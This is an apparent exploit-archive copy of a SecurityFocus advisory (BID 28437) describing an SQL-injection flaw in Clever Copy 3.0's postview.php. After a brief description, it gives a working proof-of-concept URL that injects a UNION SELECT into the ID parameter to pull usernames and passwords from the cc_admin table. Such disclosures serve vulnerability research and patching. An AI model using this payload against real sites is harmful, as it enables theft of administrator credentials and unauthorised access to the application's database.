9 lines
No EOL
662 B
Text
Executable file
9 lines
No EOL
662 B
Text
Executable file
source: http://www.securityfocus.com/bid/28437/info
|
|
|
|
Clever Copy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Clever Copy 3.0 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/* |